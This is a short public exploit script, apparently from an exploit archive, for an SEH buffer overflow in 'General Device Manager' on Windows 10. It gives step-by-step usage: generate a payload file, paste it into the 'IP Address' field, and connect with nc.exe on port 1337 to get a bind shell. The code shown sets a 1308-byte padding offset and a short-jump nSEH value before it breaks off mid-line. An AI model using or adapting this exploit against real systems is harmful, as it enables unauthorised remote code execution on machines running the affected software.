# Exploit Title: General Device Manager - Buffer Overflow (SEH) # Date: 30.07.2023 # Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ= # Software Link 2: https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip # Exploit Author: Ahmet Ümit BAYRAM # Tested Version: # Tested on: Windows 10 64bit # 1.- Run python code : exploit.py # 2.- Open pwned.txt and copy all content to clipboard # 3.- Open Device Manage and press Add Device # 4.- Paste the content of pwned.txt into the 'IP Address' # 5.- Click 'OK' # 6.- nc.exe local IP Port 1337 and you will have a bind shell # 7.- R.I.P. Condor <3 import struct offset = b"A" * 1308 nseh = b"\xEB\x06\x90\x90" # jmp short seh = struct.pack('